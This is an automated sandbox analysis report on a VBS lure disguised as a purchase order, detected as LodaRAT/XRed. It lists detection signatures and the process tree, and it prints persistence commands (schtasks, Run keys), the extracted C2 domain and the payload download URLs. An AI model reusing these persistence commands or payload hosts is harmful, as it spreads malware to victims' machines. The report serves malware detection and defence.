Windows Analysis Report
Purchase Order Summary Details.vbs

Overview

General Information

Sample name:Purchase Order Summary Details.vbs
Analysis ID:1582354
MD5:3f54630f2965d5cce0465f1e80bb9b18
SHA1:51384b0b125117f4a25ffc39de41390651593f7a
SHA256:c0ef8a963ad2dae97f7277def4b571d5fb03270d46e640282ec806ca95d3b874
Tags:knkbkk212vbsuser-JAMESWT_MHT
Infos:

Detection

LodaRAT, XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Drops PE files to the startup folder
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

  • System is w10x64
  • wscript.exe (PID: 400 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • update.exe (PID: 7404 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe" MD5: 290A46D2614F4CE4F7AD75D2CEA2CE23)
  • update.exe (PID: 7592 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe" MD5: 290A46D2614F4CE4F7AD75D2CEA2CE23)
  • update.exe (PID: 7652 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe" MD5: 290A46D2614F4CE4F7AD75D2CEA2CE23)
    • ._cache_update.exe (PID: 7704 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
      • cmd.exe (PID: 7784 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7848 cmdline: schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 7856 cmdline: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 7744 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: B50AAC59E97F3D38A19ACB9253FABEBC)
      • WerFault.exe (PID: 608 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7744 -s 13324 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 7812 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • XNLAGO.exe (PID: 7908 cmdline: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • XNLAGO.exe (PID: 2156 cmdline: "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe" MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • Synaptics.exe (PID: 4580 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: B50AAC59E97F3D38A19ACB9253FABEBC)
  • XNLAGO.exe (PID: 6340 cmdline: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • XNLAGO.exe (PID: 8124 cmdline: "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe" MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • ._cache_update.exe (PID: 7096 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • XNLAGO.exe (PID: 5640 cmdline: "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe" MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • XNLAGO.exe (PID: 6396 cmdline: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • cleanup
Name: Loda, LodaRAT
Description: Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.loda
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_XRed | Yara detected XRed | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\BQQQVU.vbs | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
C:\ProgramData\Synaptics\RCXD42.tmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\ProgramData\Synaptics\RCXD42.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\Users\user\Documents\CZQKSDDMWR\~$cache1 | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\Users\user\Documents\CZQKSDDMWR\~$cache1 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.1311156718.0000019411790000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
00000000.00000003.1307643273.0000019411A90000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
00000000.00000003.1307643273.0000019411A90000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
00000015.00000002.2552714676.00000000032E0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
00000000.00000003.1311247337.0000019410D85000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
0.3.wscript.exe.1941183d1b4.2.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
8.0.update.exe.400000.0.unpack | JoeSecurity_XRed | Yara detected XRed | Joe Security |
8.0.update.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
0.3.wscript.exe.19411b43684.0.unpack | JoeSecurity_XRed | Yara detected XRed | Joe Security |

                                System Summary

                                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, Initiated: true, ProcessId: 7704, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49840
                                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 185.199.108.133, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 400, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, ParentProcessId: 7704, ParentProcessName: ._cache_update.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs, ProcessId: 7856, ProcessName: wscript.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, ParentProcessId: 7704, ParentProcessName: ._cache_update.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs, ProcessId: 7856, ProcessName: wscript.exe
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs", CommandLine|base64offset|contains: :^, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs", ProcessId: 400, ProcessName: wscript.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, ProcessId: 7704, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BQQQVU
                                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.199.108.133, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 400, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699
                                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 400, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1, CommandLine: schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7784, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1, ProcessId: 7848, ProcessName: schtasks.exe
                                Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, ParentProcessId: 7704, ParentProcessName: ._cache_update.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs, ProcessId: 7856, ProcessName: wscript.exe
                                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs", CommandLine|base64offset|contains: :^, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs", ProcessId: 400, ProcessName: wscript.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, ProcessId: 7652, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 7744, TargetFilename: C:\Users\user~1\AppData\Local\Temp\uvpPtB1E.xlsm

                                AV Detection

                                Source: http://xred.site50.net/syn/SUpdate.ini0$Avira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/SSLLibrary.dlAvira URL Cloud: Label: malware
                                Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\ProgramData\Synaptics\RCXD42.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\ProgramData\Synaptics\RCXD42.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\AppData\Local\Temp\BQQQVU.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: 0.3.wscript.exe.19411b43684.0.unpackMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                                Source: C:\ProgramData\Synaptics\RCXD42.tmpReversingLabs: Detection: 92%
                                Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exeReversingLabs: Detection: 92%
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeReversingLabs: Detection: 68%
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeReversingLabs: Detection: 92%
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeReversingLabs: Detection: 68%
                                Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1ReversingLabs: Detection: 92%
                                Source: Purchase Order Summary Details.vbsVirustotal: Detection: 46%Perma Link
                                Source: Purchase Order Summary Details.vbsReversingLabs: Detection: 31%
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.0% probability
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1Joe Sandbox ML: detected
                                Source: C:\ProgramData\Synaptics\RCXD42.tmpJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exeJoe Sandbox ML: detected
                                Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49699 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49821 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49820 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:49831 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:49832 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49858 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49874 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49875 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:49885 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49886 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:49890 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49891 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49907 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49908 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49931 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49932 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:49943 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:49944 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49953 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49954 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49977 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49980 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50016 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50014 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50049 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50050 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50072 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50073 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50095 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50096 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50112 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50111 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50127 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50130 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50139 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50140 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50143 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50145 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50147 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50155 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:50162 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50168 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50170 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50172 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50174 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:50183 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50184 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:50185 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50186 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50192 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50194 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50204 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50203 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50208 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50209 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50220 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50222 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50224 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50226 version: TLS 1.2
                                Source: wscript.exe, 00000000.00000003.1311156718.0000019411790000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
